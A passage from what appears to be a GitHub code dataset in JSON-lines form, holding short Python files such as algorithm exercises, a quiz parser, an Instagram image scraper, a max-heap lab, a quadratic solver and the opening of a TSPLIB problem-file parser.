dict:\n dict[word[i][j]] += 10 ** (len(word[i]) - j - 1)\n else:\n dict[word[i][j]] = 10 ** (len(word[i]) - j - 1)\n\nnums = []\n\nfor v in dict.values():\n nums.append(v)\n\nnums.sort(reverse=True)\n\nans = 0\npows = 9\nfor i in nums:\n ans += pows * i\n pows -= 1\nprint(ans)\n","repo_name":"chojs23/problemSolving","sub_path":"boj/그리디/1339.py","file_name":"1339.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"40778399411","text":"import re\nimport json\nfile = open(\"8989.txt\", 'r', encoding=\"utf8\")\n\nrow = file.readlines()\n\nquestions = []\n\nquestion = \"\"\noptions = []\n\n# re.match(r'^\\d+\\.', line):\n\nprev_line = \"\"\n\nfor line in row:\n if re.match(r'^\\d+\\. ', line):\n question = line\n elif re.match(r'^.\\) ', line):\n otvet = line[3:]\n options.append(otvet)\n\n if re.match(r'^Г\\) ', line):\n questions.append(\n {\n \"question\": question,\n \"options\": options,\n \"correct\": 0\n }\n )\n question = \"\"\n options = []\n\n#print(json.dumps(questions, indent=4))\n#print(questions)\n\nwith open('8989.json', 'w') as outfile:\n json.dump(questions, outfile)\n","repo_name":"vladsadretdinov/medichkinet","sub_path":"__source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38079078557","text":"#-----17 program to convert height (in feet and inches) to centimetres-----\ndef main():\n while True:\n try:\n print('Enter the height in the following format ft,inches')\n height = input('Enter height : ')\n h = height.split(',')\n centi = float(h[0]) * 30.48 + float(h[1]) * 2.54\n print('The given height in centimeters is' , centi , 'cm')\n break\n except:\n print('Invalid entry, follow the format')\nmain()\n","repo_name":"laibanasir/python-assignments","sub_path":"17 ft inches to cm.py","file_name":"17 ft inches to cm.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"35"} +{"seq_id":"5864192731","text":"import sys\n\nsys.path.append('..')\nfrom Scraper.common.util import save_json, read_json\nfrom Scraper.common.base_classes import Scraper, STATUS_UNFINISHED, STATUS_FINISHED\nimport pandas as pd\nimport os\nimport logging\nimport time\nimport requests\nfrom tqdm import tqdm\n\n\ndef get_image(url):\n try:\n r = requests.get(url)\n r.raise_for_status() # raises an HTTPError if an error has occurred during the request (e.g. 404)\n return r.content\n except requests.exceptions.HTTPError as err:\n print(err)\n # logger.error(err)\n # logger.error(r.content.decode('utf-8'))\n\n\ndef create_log_msg(post_id, msg):\n return \"{} - {}\".format(post_id, msg)\n\n\nclass InstagramImageScraper(Scraper):\n \"\"\"\n Scrapes images from Instagram given the image urls\n \"\"\"\n\n def __init__(self, scrape_folder, posts, sleep_time, max_attempts=10, skip_if_exists=True):\n \"\"\"\n The scrape will go over each post in 'posts' and attempt to scrape it.\n After it has reached the bottom of the posts list, it will re-do the scrape for all failed posts.\n This process is repeated until each post is either successfully scraped or has 'max_attempts' failed attempts.\n :param scrape_folder: folder where results and scrape data will be stored to.\n :param posts: Iterable that contains 3 lists: post ids, post shortcodes, image urls\n :param sleep_time: time to wait between scrapes in seconds.\n :param max_attempts: scraper will stop trying to scrape a post if it has failed at least max_attempts times.\n :param skip_if_exists: skip images that already exist in the output folder\n \"\"\"\n super().__init__(scrape_folder)\n self.skip_if_exists = skip_if_exists\n\n post_ids, shortcodes, image_urls = posts\n\n assert len(post_ids) == len(set(post_ids)), \"Please remove duplicate posts\"\n\n self.image_folder = os.path.join(self.scrape_folder, \"images\")\n os.makedirs(self.image_folder, exist_ok=True)\n\n # Load scrape config if there is an existing one, else create new one\n self.config_file = os.path.join(self.scrape_folder, \"scraping_config.csv\")\n if os.path.exists(self.config_file):\n print(\"Resuming scrape from existing config...\")\n self._read_config()\n else:\n print(\"Initializing new scrape...\")\n self.config = pd.DataFrame(data={\n \"post_id\": post_ids,\n \"image_scraped\": [0] * len(post_ids), # 0=no, 1=yes\n \"image_attempts\": [0] * len(post_ids), # number of attempted scrapes\n \"max_attempts\": [max_attempts] * len(post_ids),\n \"shortcode\": shortcodes,\n \"image_url\": image_urls\n })\n self._save_config()\n\n logging.basicConfig(filename=os.path.join(scrape_folder, 'scraping_log.txt'),\n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M:%S', level=logging.DEBUG)\n self.logger = logging.getLogger(__name__)\n\n self.sleep_time = sleep_time\n\n def get_image(self, image_url):\n try:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n r = requests.get(image_url, headers=headers)\n r.raise_for_status() # raises an HTTPError if an error has occurred during the request (e.g. 404)\n return r.content\n except requests.exceptions.HTTPError as errh:\n self.logger.error(\"Http error: {}\".format(errh))\n self.logger.error(\"Error message: {}\".format(errh.response.content.decode()))\n except requests.exceptions.ConnectionError as errc:\n self.logger.error(\"Connection error: {}\".format(errc))\n except requests.exceptions.Timeout as errt:\n self.logger.error(\"Connection error: {}\".format(errt))\n except requests.exceptions.RequestException as errr:\n self.logger.error(\"Oops: Something Else: {}\".format(errr))\n return None\n\n def scrape(self, *args, **kwargs):\n while not self.get_scrape_status(do_print=True) == STATUS_FINISHED:\n for post_id in tqdm(self._get_undone_posts(), desc=\"Scraping round progress\"):\n scrape_success = False\n\n # get post info\n shortcode = self.config.loc[self.config[\"post_id\"] == post_id, \"shortcode\"].item()\n image_url = self.config.loc[self.config[\"post_id\"] == post_id, \"image_url\"].item()\n\n # skip post if it already exists on the disk\n fpath = os.path.join(self.image_folder, \"{}_{}.jpg\".format(post_id, shortcode))\n if os.path.exists(fpath) and self.skip_if_exists:\n # print(fpath, \"already exists\")\n self._increment_config(post_id, \"image_scraped\")\n scrape_success = True\n continue # will go into 'finally' block\n\n # attempt to scrape the image\n self.logger.info(create_log_msg(shortcode, \"Extracting image content...\"))\n self._increment_config(post_id, \"image_attempts\")\n ####\n ## Alternate version of the image url that doesn't expire. I have not tested this a lot so if it fails use the image url stored in thes crape data (i.e. comment the below line out)\n image_url = \"https://www.instagram.com/p/{}/media/?size=l\".format(shortcode)\n ####\n img = get_image(image_url)\n if img is not None:\n with open(fpath, \"wb\") as f:\n f.write(img)\n self._increment_config(post_id, \"image_scraped\")\n scrape_success = True\n else:\n print(\"error on post with shortcode=\", shortcode)\n time.sleep(self.sleep_time)\n print(\"Scraped post {}, result: {}\".format(shortcode, \"success\" if scrape_success else \"fail\"))\n self._save_config()\n\n # for s in tqdm(range(300),\n # desc=\"Short break between scrape rounds to wait for temporarily unavailable posts to come back\"):\n # time.sleep(1)\n\n print(\"Images saved to {}\".format(self.image_folder))\n print(\"unscraped posts:\", self._get_undone_posts(shortcode=True))\n print(\"This scrape is complete. To re-do it, please create a new one in a different folder.\")\n\n def _read_config(self):\n self.config = pd.read_csv(self.config_file)\n\n def _save_config(self):\n self.config.to_csv(self.config_file, index=False)\n\n def _increment_config(self, post_id, variable):\n self.config.loc[self.config[\"post_id\"] == post_id, variable] += 1\n self._save_config()\n\n def _get_image_done(self, df):\n \"\"\"\n returns whether all image data has been either scraped or exceeded the max number of attempts\n \"\"\"\n return df[(df[\"image_scraped\"] == 1) | (df[\"image_attempts\"] >= df[\"max_attempts\"])]\n\n def _get_undone_posts(self, shortcode=False):\n df_done = self._get_image_done(self.config)\n keyword = \"shortcode\" if shortcode else \"post_id\"\n return list(self.config[~self.config.index.isin(df_done.index)][keyword])\n\n def get_scrape_status(self, do_print=False):\n \"\"\"\n rows: posts\n columns: total (all), done (scraped or failed), scraped (successfully scraped), failed (scraping failed more times than max_attempts allows))\n used to view the scrape progress\n \"\"\"\n\n df = self.config\n\n data = [\n [len(df)],\n [len(self._get_image_done(df))],\n [len(df[df[\"image_scraped\"] == 1])],\n [len(df[df[\"image_attempts\"] >= df[\"max_attempts\"]])]\n ]\n res = pd.DataFrame(data=data, columns=[\"images\"], index=[\"total\", \"done\", \"scraped\", \"failed\"])\n\n if do_print:\n print(\"Scrape status:\")\n print(res)\n\n done = res.at[\"done\", \"images\"] == res.at[\"total\", \"images\"]\n if done:\n if do_print:\n print(\"unscraped posts:\", self._get_undone_posts(shortcode=True))\n status = STATUS_FINISHED\n else:\n status = STATUS_UNFINISHED\n print(\"scrape status:\", status)\n return status\n\n def combine_scrape_results(self, skip_if_exists=True, *args, **kwargs):\n # not needed for images\n pass\n\n\ndef do_scrape(output_folder, scrape_names, input_table_files):\n \"\"\"\n Manages multiple consecutive scrapes\n :param: output_folder: path to store the scraped data at (sub-folder for each scrape will be created automatically)\n :param scrape_names: list of scrape names, from which the scrape folders will be constructed\n :param input_table_files: input table for each scrape (which is the output table of the feed scrape)\n \"\"\"\n for i, scrape_name in enumerate(scrape_names):\n # contains posts to be scraped\n df_in = pd.read_csv(input_table_files[i])\n\n scrape_folder = os.path.join(output_folder, scrape_name)\n\n # filter df_in to only include images that should be scraped\n if \"scrape_image\" in df_in.columns:\n df_in = df_in[df_in[\"scrape_image\"] == True]\n\n post_ids = list(df_in[\"id\"])\n post_shortcodes = list(df_in[\"shortcode\"])\n image_urls = list(df_in[\"thumbnail_src\"])\n posts = zip(post_ids, post_shortcodes, image_urls)\n\n scraper = InstagramImageScraper(scrape_folder, scrape_name, posts, sleep_time=0, max_attempts=5)\n status = scraper.get_scrape_status()\n\n if status == STATUS_UNFINISHED:\n scraper.scrape()\n\n\nif __name__ == \"__main__\":\n casestudy = \"Dublin_GCT\"\n\n scrape_name = casestudy\n input_table = \"../../../data/IconicityStudies/Feed_preprocessed/{}/{}_metadata.csv\".format(casestudy, casestudy)\n output_folder = \"../../../data/IconicityStudies/Images\"\n do_scrape(output_folder, [scrape_name], [input_table])\n","repo_name":"solfang/Social-Media-Data-Pipeline","sub_path":"Scraper/RapidAPI/InstagramImageScraper.py","file_name":"InstagramImageScraper.py","file_ext":"py","file_size_in_byte":10197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32153121454","text":"\"\"\"Contains code for Max Heap\nCPE 202\nLab 6\nAuthor: Adrian Abarca\n\"\"\"\n\ndef insert(arr, item, end):\n \"\"\"inserts an item to the heap\n Args:\n arr (list): heap array\n item (int): item you want to add\n end (int): end of the max heap\n Returns:\n list: heap after item was inserted\n Raises:\n IndexError: if end is none or the end of the list\n \"\"\"\n if end is None or end == (len(arr)-1):\n raise IndexError\n arr[end+1] = item\n shift_up(arr, end)\n return arr\n\ndef del_max(arr, end=None):\n \"\"\"deletes the max item in the heap\n Args:\n arr (list): heap array\n end (int): end of the heap\n Returns:\n list: arr after deleting max\n int: max value that was deleted\n int: end of the list\n \"\"\"\n end = len(arr) - 1\n max_val = arr[0]\n arr[0] = arr[end]\n shift_down(arr, 0, end-1)\n return arr, max_val, end-1\n\ndef shift_up(arr, index):\n \"\"\"shifts up item at index\n Args:\n arr (list): heap array\n index (int): index of item you want to shift up\n \"\"\"\n idxparent = index_parent(index)\n if arr[idxparent] is None:\n return\n if idxparent < 0 or arr[idxparent] >= arr[index]:\n return\n temp = arr[index+1]\n arr[index+1] = arr[idxparent]\n arr[idxparent] = temp\n return shift_up(arr, idxparent)\n\ndef shift_down(arr, index, end):\n \"\"\"shifts down item at index\n Args:\n arr (list): heap array\n index (int): index of item you want to shift down\n end (int): end of the heap array\n \"\"\"\n max_idx = index_maxchild(arr, index, end)\n if max_idx < 0:\n return None\n if arr[max_idx] is None:\n return None\n temp = arr[index]\n arr[index] = arr[max_idx]\n arr[max_idx] = temp\n return shift_down(arr, max_idx, end)\n \ndef heapify(arr):\n \"\"\"heapifies an arr\n Args:\n arr (list): heap array\n Returns:\n list: array that has been heapified\n \"\"\"\n length = len(arr)\n idx = index_parent(length - 1)\n while idx >= 0:\n shift_down(arr, idx)\n idx = idx - 1\n return arr\n\ndef index_parent(idx):\n \"\"\"computes parent of an index\n Args:\n idx (int): index of item you want to find parent of\n Returns:\n int: index of the parent\n \"\"\"\n return (idx - 1) // 2\n\ndef index_left(idx):\n \"\"\"computes left child of an index\n Args:\n idx (int): index of item you want to find left child\n Returns:\n int: left child of the index node\n \"\"\"\n return 2 * (idx) + 1\n\ndef index_right(idx):\n \"\"\"computes right child of an index\n Args:\n idx (int): index of item you want to find right child\n Returns:\n int: right child of the index node\n \"\"\"\n return 2 * (idx) + 2\n\ndef index_maxchild(arr, idx, end):\n \"\"\"computes max child of an index\n Args:\n arr (list): heap array\n idx (int): index interested in of finding max child\n end (end): end index of heap array\n Returns:\n int: max child of the index\n \"\"\"\n left = arr[index_left(idx)]\n right = arr[index_right(idx)]\n if left <= end and right <= end:\n if left > right:\n return left\n else:\n return right\n","repo_name":"adrianabarca42/CPE-202","sub_path":"lab6 - Heap Sort/max_heap.py","file_name":"max_heap.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13176476192","text":"import os\nimport pandas as pd\n\nfrom settings import INPUTS_PATH\n\ndef gen_mixed_freq_dataset():\n df = pd.read_csv(os.path.join(INPUTS_PATH, \"mixed_freq_raw_df.csv\"))\n df.index = pd.to_datetime(df[\"date\"])\n df.set_index(\"date\", inplace=True)\n df = df.sort_index()\n\n out_list = []\n for colname in df.columns:\n tmp_df = df[[colname]].dropna()\n tmp_df = tmp_df / (tmp_df).shift(1) - 1\n\n out_list.append(tmp_df)\n out_df = pd.concat(out_list, axis=1)\n\n out_df.to_csv(os.path.join(INPUTS_PATH, \"mixed_freq_df.csv\"))\n\n\nif __name__ == \"__main__\":\n gen_mixed_freq_dataset()\n \n\n\n\n","repo_name":"dcuoliveira/few-shot-learning-ts","sub_path":"src/gen_mixed_freq_dataset.py","file_name":"gen_mixed_freq_dataset.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4016958856","text":"import plotly.graph_objects as go\n\ndef plotly_plot_bivariate_normal_pdf(x, y, z, name=\"\"):\n fig = go.Figure(data=[go.Surface(x=y, y=x, z=z)])\n fig.update_traces(contours_z=dict(show=True, \n usecolormap=True,\n highlightcolor=\"limegreen\", \n project_z=True))\n fig.update_layout(title=name, autosize=False,\n scene_camera_eye=dict(x=1.5, y=-1.5, z=1.5),\n width=1200, height=600,\n margin=dict(l=50, r=50, b=50, t=50))\n fig.show()","repo_name":"AnaviaD/BlenderPythonProjects","sub_path":"JustPython/plotly_plot_bivariate_normal_pdf.py","file_name":"plotly_plot_bivariate_normal_pdf.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35122279006","text":"# https://practice.geeksforgeeks.org/problems/anagram-palindrome4720/1/#\n\n\nclass Solution:\n def isPossible(self, S):\n # code here\n d_chars = {}\n for c in S:\n d_chars.setdefault(c, 0)\n d_chars[c] += 1\n\n odd = 0\n for _, v in d_chars.items():\n if v % 2 != 0:\n odd += 1\n\n if odd > 1:\n return False\n return True\n\n\nif __name__ == '__main__':\n s = 'geeksogeeks'\n s = 'geeksforgeeks'\n print(Solution().isPossible(s))\n","repo_name":"hdthuc93/dsa_practice","sub_path":"anagram_palindrome.py","file_name":"anagram_palindrome.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42097578014","text":"# Once upon a time, in a kingdom far, far away, there lived a King Byteasar II. There was nothing special about him or his kingdom. As a mediocre ruler, he preferred hunting and feasting over doing anything about his kingdom's prosperity.\n\n# Luckily, his adviser, the wise magician Bitlin, worked for the kingdom's welfare day and night. However, since there was no one to advise him, he completely forgot about one important thing: the roads! Over the years most of the two-way roads built by Byteasar's predecessors were forgotten and no longer traversable. Only a few roads can still be used.\n\n# Bitlin wanted each pair of cities to be connected, but couldn't find a way to figure out which roads are missing. Desperate, he turned to his magic crystal ball for help. The crystal showed him a programmer from the distant future: you! Now you're the only one who can save the kingdom. Given the existing roads and the number of cities in the kingdom, you should use the most modern technologies and find out which roads should be built again to connect each pair of cities. Since the crystal ball is quite old and meticulous, it will only transfer the information if it is sorted properly.\n\n# The roads to be built should be returned in an array sorted lexicographically, with each road stored as [cityi, cityj], where cityi < cityj.\n\n# Example\n\n# For cities = 4 and roads = [[0, 1], [1, 2], [2, 0]],\n# the output should be\n# solution(cities, roads) = [[0, 3], [1, 3], [2, 3]].\n\n# See the image below: the existing roads are colored black, and the ones to be built are colored red.\n\ndef solution(cities, roads):\n all_roads = [[None for j in range(cities)]\n for i in range(cities)]\n\n for i in range(len(roads)):\n for j in range(len(roads[i]) - 1):\n row = roads[i][j]\n col = roads[i][j + 1]\n all_roads[row][col] = True\n all_roads[col][row] = True\n\n print('allroads', all_roads)\n\n missing_roads = []\n for i in range(cities):\n for j in range(cities):\n road_pair = []\n print(i, j, all_roads[i][j])\n if i != j and all_roads[i][j] == None:\n road_pair.append(i)\n road_pair.append(j)\n all_roads[j][i] = True\n missing_roads.append(road_pair)\n\n return missing_roads\n\n\ns = solution(4, [[0, 1],\n [1, 2],\n [2, 0]])\nprint(s)\n","repo_name":"thiagobrunoms/coding","sub_path":"mix/codesignal/graphs_arcades/roads_building.py","file_name":"roads_building.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2087811985","text":"import scipy.io as scio\r\nimport numpy as np\r\n\r\n\r\ndef DFT_gen(dft_mode):\r\n if dft_mode == 'dft':\r\n dft_mtx = scio.loadmat('./DFT_matrices/dft_16.mat')['W_UPA'] # columns are DFT bf vectors\r\n elif dft_mode == 'dft_corrupted':\r\n dft_mtx = scio.loadmat('./DFT_matrices/dft_16_corrupted.mat')['W_UPA_corrupted'] # columns are DFT bf vectors\r\n else:\r\n dft_mtx = 0\r\n ValueError('please check DFT mode.')\r\n num_beam = dft_mtx.shape[1]\r\n num_ant = dft_mtx.shape[0]\r\n dft_mtx_r = np.real(dft_mtx)\r\n dft_mtx_i = np.imag(dft_mtx)\r\n dft_cat = np.zeros((num_beam, 2 * num_ant))\r\n for ii in range(num_beam):\r\n for jj in range(num_ant):\r\n dft_cat[ii, 2*jj] = dft_mtx_r[jj, ii]\r\n dft_cat[ii, 2*jj+1] = dft_mtx_i[jj, ii]\r\n\r\n return dft_cat\r\n\r\n# dft_mtx = load_file['W_UPA']\r\n# a = DFT_gen()\r\n# pp = 1\r\n","repo_name":"YuZhang-GitHub/Codebook_Learning_RL","sub_path":"DFT_gen.py","file_name":"DFT_gen.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"74180987300","text":"#User function Template for python3\n\nclass Solution:\n def diagonalSort(self, matrix, n, m):\n # code here\n lft=[]\n up=[]\n dg=[]\n for i in range(1,n):\n st=i\n en=0\n ans=[]\n while(0<=en 0:\n n, m = map(int, input().strip().split())\n inputLine = list(map(int, input().strip().split()))\n matrix = [[0 for j in range(m)] for i in range(n)]\n for i in range(n):\n for j in range(m):\n matrix[i][j] = inputLine[i * m + j]\n ob=Solution()\n ob.diagonalSort(matrix,n,m)\n for i in range(n): \n for j in range(m): \n print(matrix[i][j], end =' ') \n print() \n tc-=1\n\n# } Driver Code Ends","repo_name":"AyushAgnihotri2025/CP-Solutions","sub_path":"GeeksforGeeks/Python3/Medium/Sort a 2D vector diagonally/sort-a-2d-vector-diagonally.py","file_name":"sort-a-2d-vector-diagonally.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"12893485500","text":"numerosEnPalabras ={\n \"0\": \"cero\",\n \"1\": \"uno\",\n \"2\": \"dos\",\n \"3\": \"tres\",\n \"4\": \"cuatro\",\n \"5\": \"cinco\",\n \"6\": \"seis\",\n \"7\": \"siete\",\n \"8\": \"ocho\",\n \"9\": \"nueve\"\n}\n\ntexto = input(\"ingrese un número, para saber como se escribe \")\n#para que ponga los números de dos o mas cifras y no sale error\ntextoFinalEnUnaSolaLinea=''\nfor letra in texto:\n textoFinalEnUnaSolaLinea += numerosEnPalabras[letra] + ' '\n\nprint(textoFinalEnUnaSolaLinea)\nprint(\"chau\")","repo_name":"profsofia/python","sub_path":"arreglos.py","file_name":"arreglos.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72137951780","text":"import math\nclass Cuadratica:\n tipo_raiz = 0\n disc = 0\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n self.discriminante()\n def discriminante(self):\n if self.a != 0:\n self.disc = ((self.b ** 2) - (4 * self.a * self.c))\n if self.disc == 0:\n self.tipo_raiz = 0\n elif self.disc > 0:\n self.tipo_raiz = 1\n else:\n self.tipo_raiz = -1\n else:\n print(\"No es una ecuacion cuadratica ya que el coeficiente de x^2 es 0\")\n def solucion(self):\n if(self.tipo_raiz==0):\n self.raices_iguales()\n elif(self.tipo_raiz==1):\n self.raices_normales()\n else:\n self.raices_imaginarias()\n def raices_iguales(self):\n x1 = x2 = (-self.b / (2 * self.a))\n print(\"El discriminante es cero, por lo cual tiene una unica solucion.\")\n print(\"El resultado de la ecuacion es: \")\n print(\"x1 = \", x1)\n print(\"x2 = \", x2)\n def raices_normales(self):\n x1 = (((-1 * (self.b)) - math.sqrt(self.disc)) / 2 * self.a);\n x2 = (((-1 * (self.b)) + math.sqrt(self.disc)) / 2 * self.a);\n print(\"El discriminante es mayor a cero, por lo cual tiene dos soluciones reales.\")\n print(\"EL resultado de la ecuacion es:\")\n print(\"x1 = \", x1)\n print(\"x2 = \", x2)\n def raices_imaginarias(self):\n x1 = (-self.b + (self.disc)) / (2 * self.a);\n x2 = (-self.b + -(self.disc)) / (2 * self.a);\n print(\"El discriminante es menor a cero, por lo cual tiene dos soluciones.\")\n print(\"El resultado de la ecuacion es:\")\n print(\"x1 = \", x1, \" + \", x2, \" i \")\n print(\"x2 = \", x1, \" - \", x2, \" i \")\n\n\nprint(\"Programa para calcular la solucion de la ecuacion expresada de la siguiente manera ax^2+bx+c=0\")\nprint(\"----------------------------------------------------------------------------------------------\")\nwhile True:\n print(\"Ingrese los valores de los coeficientes(a, b y c) de la ecuacion\")\n print(\"Recuerde que el coeficiente de x^2 debe ser diferente de 0\")\n while True:\n a = float(input(\"a: \"))\n if(a != 0):\n break\n b = float(input(\"b: \"))\n c = float(input(\"c: \"))\n respuesta = Cuadratica(a,b,c)\n respuesta.solucion()\n cerrar = input(\"Si desea salir ingrese 0: \")\n str(cerrar)\n if cerrar == \"0\":\n break\n","repo_name":"EstebanOG/Ejercicios_Python","sub_path":"POO/ecuacion_cuadratica.py","file_name":"ecuacion_cuadratica.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70427312742","text":"divm = 11\nn = 11\nlast = 10**n\nssts = []\ndebug = 0\n\ndef setgoodlist(len, adiv):\n atmp = [0,1,2,3,4,5,6,7,8,9]\n btmp = [0,1,2,3,4,5,6,7,8,9]\n for i in atmp:\n remain = (adiv - i*(10 **(len-1))) % adiv\n if (adiv - 10*remain) % adiv > 9:\n btmp.remove(i)\n if debug > 0:\n print(\"btmp=\" + str(btmp));\n return btmp\n\ndef dropdigs(k,l):\n ktmp = (k // l) * l\n ktmp -= 1\n while (ktmp % divm) != 0:\n ktmp -= 1\n if debug >= 2:\n print(\"dropdigs(\" + str(k) + \",\" + str(l) + \" -> \" + str(ktmp))\n return ktmp\n\ndef walking(k):\n aa = 0\n kt = k*10\n ktl = kt % last\n if debug >= 2:\n print(\"walk in(\" + str(k) + \"), last=\" + str(last) + \", ktl=\" + str(ktl))\n if ((ktl - 1) % divm) + 10 < divm:\n if debug >= 2:\n print(\"walk premature(\" + str(k) + \"), aa=\" + str(aa))\n return aa\n if ktl % divm == 0:\n a = kt\n else:\n a = kt + (divm - (ktl % divm))\n\n al = a % last\n if al not in ssts:\n if debug >= 2:\n print(\"walk !contains(\" + str(al) + \"), a=\" + str(a))\n ssts.append(al)\n aa = max(aa,a)\n atmp = walking(a)\n aa = max(aa,atmp)\n ssts.remove(al)\n else:\n if debug >= 2:\n print(\"walk contains(\" + str(al) + \"), a=\" + str(a))\n if debug >= 2:\n print(\"walk out(\" + str(k) + \") -> \" + str(aa))\n return aa\n \n\nfor n in range(1,16):\n goodlist = setgoodlist(n,divm)\n last = 10**n\n beg = int(n*'9')\n end = int((n-1)*\"9\")\n i = beg\n while i % divm != 0:\n i -= 1\n if debug >= 2:\n print (\"i=\" + str(i) + \", n=\" + str(n) + \", beg=\" + str(beg) + \", end=\" + str(end))\n an = i\n oldan = an\n anlen = n\n while i > end:\n ssts = [i]\n if i % 100000 == 0:\n anlen = len(str(an))\n if anlen > 2*n:\n anlen = 2*n - 1\n an = max(an,walking(i))\n i -= divm\n for j in range(anlen - n+1):\n jten = 10 ** (n - j-1)\n if jten < 1:\n break\n while (i // jten) % 10 not in goodlist:\n i = dropdigs(i,jten)\n print(str(n) + \" \" + str(an))\n","repo_name":"gfis/OEIS-mat","sub_path":"contrib/A093211.py","file_name":"A093211.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"13124443519","text":"\"\"\"Parser, file loader and container factory.\n\"\"\"\nfrom typing import Tuple, Union\nimport re\nimport gzip\n\nimport numpy as np\n\nfrom .exceptions import BadTspFile, ParsingError, UnsupportedEdgeWeight\nfrom .constants import ProblemType, EdgeWeightType, EdgeWeightFormat, EdgeDataFormat, NodeCoordinateType, DisplayDataType\nfrom .containers import Solution, Problem\nfrom .metrics import Euclidean, AttPseudoEuclidean, CeilEuclidean, Geographical, Manhattan, MaximumLinf\n\n\n\ndef parse_to_dict(filename: str, force_gzip: bool=False) -> Tuple[dict,dict]:\n \"\"\"Load a TSPLIB file and construct a Problem or Tour object.\n\n Parameters\n ----------\n filename : str\n Filename to load. If the filename ends with .gz then we will assume it's GZIP'd. This can\n be overridden with the force_gzip option.\n force_gzip : bool, optional\n If True, then the reader will assume the file is gzipped, otherwise it will try to figure it\n out for itself. Optional, default is False.\n\n Returns\n -------\n Tuple[dict,dict]\n Tuple containing the specification dictionary and the data dictionary.\n\n Raises\n ------\n BadTspFile\n If there is an internal problem with the TSPLIB file.\n ParsingError\n If the parser has become lost and cannot continue parsing.\n \"\"\"\n # Dictionaries to store the return data.\n specification = {'comments':[]}\n data = {}\n\n # These enumeration mappings simplify our parsing by searching for TSPLIB file strings\n # and matching them to the appropriate enum.\n _edge_weight_type_map = {_x.value:_x for _x in EdgeWeightType}\n _problem_type_map = {_x.value:_x for _x in ProblemType}\n _edge_weight_format_map = {_x.value:_x for _x in EdgeWeightFormat}\n\n # Select the correct file handler: standard i/o or gzip.\n file_handler = open\n if filename[-3:]=='.gz' or force_gzip==True:\n file_handler = gzip.open\n\n # Process each line in the file. This operates as a state machine and defaults to\n # searching for specification data.\n with file_handler(filename,'rt') as fh:\n state = 'specification'\n\n for _buffer in fh:\n buffer = _buffer.strip()\n\n if len(buffer)>0:\n # If we are in a specification state then search for\n # a specification string.\n if state=='specification':\n\n g = re.search('(\\w+)\\s*:\\s*([\\s\\S]+)',buffer)\n if g is not None:\n token = g.group(1)\n content = g.group(2).strip()\n\n if token=='NAME':\n specification['name'] = content\n\n elif token=='TYPE':\n if content=='TOUR':\n specification['type'] = 'TOUR'\n else:\n if content in _problem_type_map:\n specification['type'] = _problem_type_map[content]\n else:\n raise BadTspFile('Unknown type of TSPLIB file <{}>'.format(content))\n\n elif token=='COMMENT':\n specification['comments'].append(content)\n\n elif token=='CAPACITY':\n specification['capacity'] = float(content)\n\n elif token=='DIMENSION':\n specification['dimension'] = int(content)\n\n elif token=='EDGE_WEIGHT_TYPE':\n if content in _edge_weight_type_map:\n specification['edge_weight_type'] = _edge_weight_type_map[content]\n else:\n raise BadTspFile('Unknown edge weight type in TSPLIB file <{}>'.format(content))\n\n elif token=='EDGE_WEIGHT_FORMAT':\n if content in _edge_weight_format_map:\n specification['edge_weight_format'] = _edge_weight_format_map[content]\n else:\n raise BadTspFile('Unknown edge weight format in TSPLIB file <{}>'.format(content))\n\n elif token=='EDGE_DATA_FORMAT':\n if content=='EDGE_LIST':\n specification['edge_data_format'] = EdgeDataFormat.EDGE_LIST\n elif content=='ADJ_LIST':\n specification['edge_data_format'] = EdgeDataFormat.ADJ_LIST\n else:\n raise BadTspFile('Unknown edge data format in TSPLIB file <{}>'.format(content))\n\n elif token=='NODE_COORD_TYPE':\n if content=='TWOD_COORDS':\n specification['node_coord_type'] = NodeCoordinateType.TWOD\n elif content=='THREED_COORDS':\n specification['node_coord_type'] = NodeCoordinateType.THREED\n elif content=='NO_COORDS':\n specification['node_coord_type'] = NodeCoordinateType.NO_COORDINATES\n else:\n raise BadTspFile('Unknown node coordinate type in TSPLIB file <{}>'.format(content))\n\n elif token=='DISPLAY_DATA_TYPE':\n if content=='COORD_DISPLAY':\n specification['display_data_type'] = DisplayDataType.COORD_DISPLAY\n elif content=='TWOD_DISPLAY':\n specification['display_data_type'] = DisplayDataType.TWOD_DISPLAY\n elif content=='NO_DISPLAY':\n specification['display_data_type'] = DisplayDataType.NO_DISPLAY\n else:\n raise 